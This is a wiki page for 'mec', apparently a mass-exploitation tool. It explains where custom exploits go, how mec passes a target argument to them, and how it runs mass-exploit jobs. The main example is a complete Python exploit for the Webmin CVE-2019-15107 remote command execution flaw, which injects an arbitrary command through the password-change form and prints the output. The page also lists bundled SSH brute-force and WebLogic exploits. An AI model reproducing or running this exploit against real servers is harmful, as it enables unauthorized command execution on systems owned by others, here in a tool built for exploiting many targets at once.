Skip to content

Custom Exploits

jm33-ng edited this page Feb 28, 2020 · 6 revisions

FAQ

Where to put my custom exploit?

ls ./exploits/your-custom-exploit/
your-exploit-executable your-other-files

Is there any example?

#!/usr/bin/python3
# pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except

'''
webmin_CVE_2019_15107
'''

import argparse
import re
import sys

import requests
import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()


def CVE_2019_15107(url, cmd):
    '''
    exp
    '''
    vuln_url = url + "/password_change.cgi"
    headers = {
        'Accept-Encoding': "gzip, deflate",
        'Accept': "*/*",
        'Accept-Language': "en",
        'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        'Connection': "close",
        'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
        'Referer': "%s/session_login.cgi" % url,
        'Content-Type': "application/x-www-form-urlencoded",
        'Content-Length': "60",
        'cache-control': "no-cache"
    }
    payload = "user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
    r = requests.post(url=vuln_url, headers=headers,
                      data=payload, verify=False)

    if r.status_code == 200 and "The current password is " in r.text:
        print(("\nvuln_url= %s" % vuln_url))
        m = re.compile(
            r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
        cmd_result = m.findall(r.content)[0]
        print()
        print(("Command Result = %s" % cmd_result))
    else:
        print("No Vuln Exist!")


parser = argparse.ArgumentParser(description='weblogic_cve-2017-10271')
parser.add_argument('-c', type=str, required=True,
                    help='command to execute on the target')
parser.add_argument('-t', type=str, required=True,
                    help='target url')
args = parser.parse_args()

try:
    CMD = args.c
    URL = "http://"+args.t

    CVE_2019_15107(URL, CMD)
except (KeyboardInterrupt, EOFError, SystemExit):
    sys.exit(0)

How does mec pass "target_ip" argument to my script?

In this demo, you can see that mec simply passes target_ip as the last argument

parser.add_argument('-t', type=str, required=True,
                    help='target url')

Note that mec passes -t <target> to your exploit, so when your exploit gets executed by mec, its command line argument looks like:

./exploit <custom args> -t <target ip>

Directory hierarchy

mec directory tree

.
├── conf
│   ├── censys.conf
│   └── zoomeye.conf
├── data
│   ├── ip_list.txt
│   ├── proxy.conf
│   ├── ss.json
│   └── zoomeye-login.action.txt
├── exploits
│   ├── ssh-bruteforce
│   ├── test
│   ├── weblogic
│   ├── webmin
│   └── witbe
├── install.py
├── lib
│   ├── cli
│   ├── __init__.py
│   ├── __pycache__
│   └── tools
├── LICENSE
├── mec
├── mec.py
├── output
│   └── result.txt
├── README.md
├── requirements.txt
├── screenshot
│   ├── main.jpg
│   └── zoomeye.jpg
└── tools
    ├── geckodriver
    └── ss-proxy

Your "test" exploit

Your custom exploits live under ./exploits, just like any built-in ones.

Take a look at test exploit:

├── ssh-bruteforce
│   └── ssh_bruteforce.py
├── test
│   └── test
├── weblogic
│   └── weblogic_cve-2017-10271.py
├── webmin
│   └── webmin.py
└── witbe
    └── witbe.py

./exploit/test/test is the exploit, you can view all available exploits by issuing exploits command in mec:

Remember to chmod +x <your exploit>, otherwise it won't be recognized

mec > exploits
[+] Available exploits: 
webmin/webmin.py
test/test
witbe/witbe.py
weblogic/weblogic_cve-2017-10271.py
ssh-bruteforce/ssh_bruteforce.py

How mec works

mec enters target exploit's directory before launching a mass-exploit job, thus relative paths are allowed, custom exploit's root directory won't change when being used by mec

Your exploit can be either a binary file or a script, as long as you chmod +x them first. Before launching a mass-exploit job, you will see a warning reminding you how your exploit is going to be executed:

[!] DEBUG: ['./ssh_bruteforce.py', '/tmp/1', 'id', '-t']
Working in /home/u/.mec/exploits/ssh-bruteforce
[?] Proceed? [y/n]